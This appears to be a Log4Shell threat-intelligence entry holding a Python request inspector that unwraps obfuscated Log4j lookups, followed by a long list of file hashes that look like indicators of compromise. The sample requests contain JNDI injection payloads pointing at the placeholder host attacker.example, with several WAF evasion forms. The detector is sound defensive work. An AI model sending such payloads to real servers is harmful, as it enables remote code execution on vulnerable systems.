_Record published 2021-12-12T05:29:03 by the Microsoft 365 Defender Threat Intelligence Team; last seen 2022-01-19. The feed entry carries a CVSS v3.1 base score of 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) and a CVSS v2 base score of 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)._
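The WAF rules above work by inspecting the request URI, headers, and body for Log4j lookup syntax, and the reason a rule has to normalize before matching is that attackers wrap `jndi` in nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`, `${date:'j'}`) and URL-encode the whole payload. The following Python is an added example written for this page, not the Azure WAF rule logic and not Microsoft code: it percent-decodes each field, evaluates nested lookups innermost-first the way Log4j 2 would (modelling only the case-mapping, date-literal and `:-` default behaviours that these evasions rely on), and flags any field that still contains `${jndi:`. The function names `normalize`, `inspect_request` and `scan`, the sample requests, and the host `attacker.example` are all constructed for the example.

```python
"""Log4Shell request inspector: an added illustration of what a WAF rule that
inspects URI, headers and body has to do before it can match ${jndi:...}.
Not the Azure WAF rule logic; the sample requests below are constructed."""
import re
import urllib.parse
from typing import Dict, List, Tuple

# A lookup with no further lookup nested inside it.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for once the evasions have been unwrapped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _is_jndi(body: str) -> bool:
    return body.split(":-", 1)[0].strip().lower().startswith("jndi")


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup offline, modelling only the Log4j 2
    behaviours that evasions rely on: ${lower:X}/${upper:X} case mapping,
    single-quoted literals in ${date:'X'}, and the ':-' default that a
    failing lookup falls back to (${::-j}, ${env:NOPE:-j}).  Any other
    lookup evaluates to its default, or to "" when it has none."""
    name, _, default = body.partition(":-")
    prefix, sep, value = name.partition(":")
    key = prefix.strip().lower() if sep else ""
    if key == "lower":
        return value.lower()
    if key == "upper":
        return value.upper()   # also maps dotless i (U+0131) to "I"
    if key == "date":
        return "".join(re.findall(r"'([^']*)'", value))
    return default


def normalize(value: str, max_rounds: int = 64) -> str:
    """Percent-decode (twice, for double encoding), then unwrap nested
    lookups innermost-first until only jndi lookups, or nothing, remain."""
    text = value
    for _ in range(2):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        match = next((m for m in _INNERMOST.finditer(text)
                      if not _is_jndi(m.group(1))), None)
        if match is None:
            break
        text = text[:match.start()] + _resolve(match.group(1)) + text[match.end():]
    return text


def inspect_request(request: Dict[str, object]) -> List[Tuple[str, str]]:
    """Return (location, normalized_text) for each of URI, headers and body
    that still contains a ${jndi:...} lookup after normalization."""
    fields = {"uri": str(request.get("uri", ""))}
    for name, val in dict(request.get("headers", {})).items():
        fields["header:" + name] = str(val)
    fields["body"] = str(request.get("body", ""))
    hits = []
    for location, raw in fields.items():
        text = normalize(raw)
        if _JNDI.search(text):
            hits.append((location, text))
    return hits


def scan(requests: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map request index -> hit locations, for requests carrying a JNDI lookup."""
    result = {}
    for i, req in enumerate(requests):
        hits = inspect_request(req)
        if hits:
            result[i] = [loc for loc, _ in hits]
    return result


# Constructed samples; attacker.example is a placeholder host.
SAMPLE_REQUESTS = [
    {"uri": "/login?user=${jndi:ldap://attacker.example:1389/a}",
     "headers": {"User-Agent": "Mozilla/5.0"}, "body": ""},
    {"uri": "/", "headers": {"User-Agent":
     "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"}, "body": ""},
    {"uri": "/", "headers": {"X-Api-Version":
     "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/x}"}, "body": ""},
    {"uri": "/search?q=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fx%7D",
     "headers": {}, "body": ""},
    {"uri": "/api", "headers": {"Content-Type": "application/json"},
     "body": '{"name": "${${env:NaN:-j}ndi:ldap://attacker.example/b}"}'},
    {"uri": "/", "headers": {"User-Agent": "curl/7.79.1"},
     "body": "report for ${date:yyyy-MM-dd}"},   # benign lookup, no JNDI
]

if __name__ == "__main__":
    for idx, locations in scan(SAMPLE_REQUESTS).items():
        print(f"request {idx}: JNDI lookup in {', '.join(locations)}")
```

Two limitations are worth stating. The resolver works offline, so a nested lookup such as `${env:PATH}` with no `:-` default evaluates to nothing here even though it might yield the needed character on the target. And a WAF sees only the request as sent, whereas the vulnerable logging call may be fed the same string later from a database or a downstream service. Treat rule hits as a signal to hunt, and the log4j-core upgrade as the fix.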
"5D661EA5B801079F3B7AF6D31A8566154E3150C1E3398EC1CFA32E9398BF38D3", "5D979AFFDF974F2910D0CF8FD15D323A264B0745C0ACF5B78092630C5EB271CE", "5DC028B7AB8CCCA9FD3F109B69D7F7AEBDC718A32C0EC71E5693C99FFB06466E", "5E0D2EC541C3D2FE5413DA829783950147FE05FA866060FB6B6B557BC4E00A16", "5E46685CCFDAFEF52C3BC0BE649F5DFE9485392CF7A7733CC64B02CFBA707DF4", "5EB805FBA32A419246DDD86FFCA6C34246C092FCBCD8608B3ABC4B0A77FFDAA2", "5ED570DDC2DC18EDBE3A6F896450F75892C392B6E12D967BD6C8F6E5EB0809E5", "5EE7E4E97581573D0B40454E7851D662668050B8C7587DA918FD85D38B92C2A2", "5F1A8E5DEF8C5B0BD8A337785BC9EC92521E4E1FC191BC80CFB2E92B4BEB7686", "5F247DF8011234E4C8E9F5DA1233AD5131F7718B99D13FA0E448AB8545E5E6F8", "5F24F58173ED799EACD7F7DC971D2ECB62B80971453D92D5DB9CA708526DE3A8", "5F61B9F9A964CB3CBB554CD28E3CE9FF36CED8CD1357DB2E45299E1C329C251A", "5FAA10ECBDD6BDD67568DC782206BEA34BD7120E44FD8D30001A968A438E5C77", "60679F1EB565A827FBFDD72C9C325755586FDA1F0AC78877A6590DED78230E66", "628B14B8AA20DB98F73DABE8C7FF0C2746646BE602A0BA4F638FBEE3E634C393", "62D22CE7464E30931544D86043D72A241CA4A2ED1A6F28AB59EEDEFFCBBFFAAB", "6305882E456CC7111E361249970AB42E196A23084AAFDDE2E82B0694295074BC", "65B30A5B63DE43E789127C5F5AD2977C7194142636581876B7BA2AE224B6420B", "6631C04F89A8D2ED4BC1256E62C3AB820EB5DE675CE6766AA9AFAB238EA92F40", "6655F0CA454D34B530E468D672328E7DE915E373D5DF7A2E41376F7E2B588F5F", "666E4FBDA68F1376E7E84944B116ED00320BF80162EF68755AD1CD31AE358231", "6741052F2A7BCCF76F84825C9FE706D98BCF279A0C055A783796DC802C323E13", "6758FD589A76487DB6421ACF317F7E42F52C2C62336F671B43C2B523483BF57E", "67A6DAD4F7DB5EFA4D058E5FA0886E6D1185C31EE7AFA1B194E5CA4D0F4A3F5C", "67B2FFD11F790787A36E0394080502A01EE907D975E33ADFF6E931A0E15B05F7", "67D7A2AD6D196C643D91F066E834B1EB9853338990881AE1012D2B5186629622", "67EEDC4E808A4DC3E092C0FD2F6DFB5714B1E7F2E2ECD7CE2F8B2F65F2D2B26F", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6920277579A35875812264472A148A4383E98310C21147950644BE922AD17700", 
"6A43E45FE98A49A0127D4FD81A7F70BC513609043DDA830926C4CD80286B1A17", "6ADEAF325A5B46B34D6E419B67D91A45C9FD7E4F02587AF0F33D5FF933653E27", "6C6D0940826336DDE7832D99EA3E6BDC3CE6950B9638280B5C586B4770666429", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6CC386F9299ECFE5F62C9D0954CED9917B32A3DFEB8BC98C8212D83DD7B53DF6", "6DD517DD7F557A31BB9EF8B8E2970701E7EBF9E1168A77A02C5EFC57A29C1AE3", "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "6FBF074F8D8E8E6000FCF6488B84CA43AEFB7DEF10B2CEFF0E7D0AE1140ADA41", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "7061882A844BC1B159CD9483EEA32DBAF5175CB9800976F7DD1F381723E88538", "7156D43131599F71B03A8F8BDCE4755976A54F82BE32B0AEF105D1E6E781F384", "7295DCCE494A2CA195C0EC2BD4F052B62F3E1B45826D03ABBF986B81F58BDD31", "72E392728BCA627E900CA46B892A2B86465C877D468139416A39573D2D6C73F6", "73781BC7A0CCEF128DBC5E169F177E52BD5AD843F08787EBE0E19CC9088C2FA9", "73EAFB98AF656367DD4CBD6C4D9BDB98FBF39B358F625D93589F37D52771AA8D", "745004E6A8DD36244AE3AE2E238FB3CA9F40B885C5F912CA9FBBD7A9FEE76248", "7473C0056DBBEF7C541ECDFB31E947DC1520282F5E0172B7C965A9DECA661856", "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", "7566B2B0BD8AE66EDD74AA6296BA3C094CC3661C2B4C3EADB69127C0EBE5A710", "76FC3815A1052A74CFCD99C9C0F5C1F4FA7C289E70171A7BA16DE2B8E6DA736B", "77486B8B5BB16D0AE922BE517509C1AEDA2019428A2A23BADFAE5682D363F74A", "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "78230A0FDE17E1A4791590999547D790CF1340A3123CA146452B6C92AF70CA24", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7A1D4AFC62D444E93951F6A46CA35876DD42680BFCB9DD562AE0F80A2C338D67", "7A36E54AFF586A013BFC64E0308098C6070D7FE82FD631B59758E4F661D42586", "7AA351B847C7732E8B7AE01A83A77CC863325C3B53A57FDDE54F4DF8D16D14C1", "7B60DE546B91D3886C995A5DE16291DEDDA95C96FC984BD69B852CF111B4C102", "7CCDD8E65FBE1F2581D0942E2116E4E61FB4753B4D48798C9D2BC8624C94826A", 
"7CE0B3947D8196985B00E6EB61ED45938560312360058DDC3063CF3D7BE03A81", "7CFF760ED43EACB85DD304FEF6EEAD9D89C48ADE6361641E84EF811056B6811F", "7D3ECDDF0FEF31AB10959BE94A3F76C4BE4F6CA1CC52373D0E460C5CA46E24A8", "7DDD006076946810EADC174FC2320565F527D46FFF5270A3D6916BF8993B12F9", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E14B22ECA169752ECE98AF6029993D38DAD48CA63B7F7A2541E649258A2178A", "7E2A7C8E981FCA78A12F6D8992BE35354D42B960D223A90BF210EE5B300BFB9E", "7E4FF868DFA0F4BDAEDFDEB60188A16AB82AC45AB8EB35F1D260229F12C10341", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "800A58A21DE4F630ECEAAA1932A596AE5A4743CB06907F342619D1D7ACD5AB64", "801604295C016952DB2E8049DC0524C86569A636C5BC867E0FB7565B433600F8", "818495FB1C54B71E6C7753464B1C7C2926402C76844055039753A11157B24B81", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "822A5D5DDFBAB14222D402C61CEAC1259D980506DB6102BD80EB619551AE1961", "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "838686EA8660AF45865AC08A8AAF01B25ECE89F900D760F085C235BD477978AE", "84B9F968C99F1D06D139A9613E0943A5C824556A856DEFE8DEE64E68329DDB5C", "86B15422FEE58FE9F2F1B22520453D09FFA84C6049446DCE8467C766E3B57967", "88119FF28113E384895FADEA63C7ABC2906571B02A874CF9D50260071AD58FB7", "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "89170AA222353F9A48D8A118FE03328E07C65970B2FBD60979FC33A65AECC8CB", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "89E699B806727E33E450302956E4D536B906A5F4CF0C0791EBBC25F005461B6D", "8A20ED34CC4EABFD78A0599C47EC735B1923D5C4CE1DF595D753961732461EA4", "8A368F9B7240AEC7A45518B26EE613BFEF287DD9E106138A5AD63F4D494034D6", "8A9E980FE740F4424FB663C857EE84E39154A02964A02540A3A74E4A80F058EE", "8B18A583802DE934D0ABAD4E3B44AE36DEAE634549737EEE9B825D44B47BD7DA", "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "8B49BD8B4756373645F1A1DA4BC3E31D1FE7BF1F5A0706A9665EE61D5A4B1419", 
"8C8A687167096A3D2AA73F94AC7D6F1C43EF830C110ED1F9406D92FAD9FCBA59", "8D4EDC587A369AADC2A4B4B6CA60C94602327216807E8B71042463A2BF381325", "8E3EC3A49910FD61ADB4E5FDC225B58A74D0BA57105F3D9A6F1B3E46361C1307", "8E5EB05CFB883D682B3A2C7D645375420476C4616183B915FE43ADDF8FA697A1", "8F6A844E65558AF61A350206417B63BD70D5B529641691C495C07407B13441B7", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9052D87C0A77FDE9339BE13D5F9E4733073147348EB17E7CF0F5B741C451ECC3", "90B290F66451E3E462C09788B6756181F62A92A8BAA10F2C4BD52977FD8E1B37", "90BE58D9524F7F6A98C3EE79C93A2EE6A0EA2C0D7E33DC628128C7D1BCFA8619", "924D425FFD71097B50917C124D87FAE558BFB3C7DAEF1BEA09CE12CCD6B264B3", "92A25ACC7CA97D427DA5F098FEAD958217F50C6C07BA13888E0C08A046DD5DA3", "92C22BB80F005566A9B6BC13CEB85433025D25B49B4109FF79DFC90B8A2B7A4A", "932EB6FF0C79CFA010373B06A99AA8906C2B3B3171A0D96A0399EF72EC35ED11", "942A563AC62B9ED7ADC9AAA1A75FE9F97DA036B632DE9ECD7DC3CC1E19EC9A60", "94633A31471B22DF4D1E9508BA6DE360B6D37FAD329018F21926F838DAF45AB4", "96004A5F0BCA499E57604F5222E28642F8BB3CC611C03BA8BD6830BAF6767297", "964A048B00AF3D409A4AA83094E36431FA7631859A2D4595D2F53EE838A705E3", "976356D0F193356D662AC659E8578D3D0CC6C5711EA8A61D28A63CCA919F9900", "980930D95C9061C71E85C435692629E07D952BA870609E55949143F9AA635712", "990B694F8FEB56054D99331B4B4370CE96BC2A4FD7C4E2B75B5E537A91E83D24", "998E998A37AA40076F35ACE20C7E0016E44B1CC4EFB6AE26D0761C68B7C99657", "99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9A1FFC27915FCEB638A5FB6C3316111A4211363FE0EC89A0019FA42A7CB89808", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9C638946C07968147BC89DE8BAE5211C4767A334F7213E99654F7C02ADD0E910", "9CF440D80F7C3ADDF67027FEB0B656E02CC2277FA267330BADF00CF32A1D4BEF", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", 
"9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9DC92E76D921D2F32AF89C6A9268FA55FE90987B5125CC3C9BFF3634818FDD1F", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "9FD1AC6E7F93ABD6198F576C4AC025E8DFA5007533DBD2FE78CC5BE3497FF3D6", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A1610C4151E05207C2B70F00002FE2069C48E736E5F65C67864C8C78D8372D2B", "A1680316198638EA55AFA837EE37AE44184E9B8BCA2B9FD668F06E417908DF87", "A1D2EE183CE8C9693B1DCADBA6A6AC4E58CAAD746DE6081E211B0D2080D3C3E4", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A2F7E57DAD21E2D5E4DB804EB652C6CD00E5CDF5B0D67125B95F4E269BA69025", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A339910401C1CBEBCD02CB63650E2A2F954071F79CBC8E8EA704AFBB756CF438", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A4DED06E2C9F4A28ADEF0AA4C6EEFDDF9D1F431EA3CF997F41E7EA22CA7B12B7", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8080DF589F1BFC2BF6B98ABD8B92D2C07AAE6F3E14977386069111BB800A09C", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A986F0D7B51C204D69DD897A085F9CB249B65DF7C839AF92D49287ACDEBDA05D", 
"A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "AC579EF06A63C7679B2D7EC4B67819D5F33EC90E9760AA522990209580D45436", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B1EA708CCF72B8264EA46A7D99E1616E7334C67D440D87A4F97B2B4087696EFD", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B39F7DFF040AEE7948452F4B23B147EBA3BC088DA5624E4E7B049C051EB56B60", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BA4F5153F7218CA2919C447302324B583F37CF0D794B41E34C5B63CF577C6462", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", 
"BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C2D7FDE6929D1789B9A1618D087E5DCB3FC2780B2EC1CA3CFF40FDF3AD014A8E", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C4B2A7F25639B468CB0778EA1E561F435356D460FB4D417EEBDD1C83186B56CD", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C786E96DD673C5766A45B6750BE6B879F3CF37718ACD79668ADC1130AF26E274", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CA643463AA3DD27CF347651D7B084BEA39601B3E21A99AD0FE90A4163037F126", "CB1A96B060B639265D7CCD4E0C186EA367A7C82E1756FDF32E57D9F350AD3873", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE291DB15FB1A7FDE49870DEF70725290D757902B5EB4009CD8DC9710150329D", 
"CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D1B56895A302CB106810B80548010A8993C467A6D8B6EA61EB430703400A5ED8", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D406490E70A52CFB0315F27FCD957BFAE7E7B2887A6C73BE83E3F514F1153348", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9425756DF631BB7CA03B3451BD1F9C557325B8A2BB0CD34A22102962A0F4213", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "D9D956C60F66CFAE1D9189841B4A3D7D9E24B0A79B088C79120CBB100E34A220", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DD0EE895B8C1D023C4A9C7DA2726D4CAC8D1495A05DF9FE91915F58FF012245D", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DEAB63B690E03D8E8203ACA19836C2D36A8ED9D5C66A32CCF4F7F6B6C9F8DE84", "DF1F3615A0C3950BF1BCF7F7E12370C0F3A7DBD2E12D656DC66F966233BD6A40", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2AA9B11D88890FE4ED3C245CC3A519ACAAD11F11F032D2AE032FE428B8C4012", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", 
"E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E3F560319C0EA06228FA2D0D5412CFFD95B8D0963A65CBAC4B6D424BA4B7B434", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E4DC5C75AB8DC1EFE3474E65C33B8EED76C2B358258DE3E2C7A0C0EA9FD53126", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E805A2E822F9F587AC809C6A8CA399694FA0BD883078F64EF001D4B79132B879", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "E8BA6A75873A4594BE92FFE48C361848E9581DAA153EABDC1D071E1A59172338", "EA3F9619545419A098A554C6AA49233D406E118A8A2221EEFF0BABB483AAC02B", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EE31BACFE4E2531B3AC2273027A23C49C59978284694658A79B4BC6797F86ACB", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", 
"EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F02EA1DD204629897DA1861F147A272B72A3FA34A5315D58B896A636EAE341F5", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F203AF8FB4A9FED8F009C8BF5E3F7D7714130DCBC84CDBF1BE1C83E438B18982", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F35EB0C55F08CA4C671A4E6D2454A08936C6D1CD868709D0EE04FB71FFC263C1", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F532C527613357C6A2A49FB79425351FAA7200585028A4FA9898C13802895FB6", "F7232359E6413A274B62C22CB7BF1EF8C428ADFBF22EF7B9B913D63D087BCACB", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", 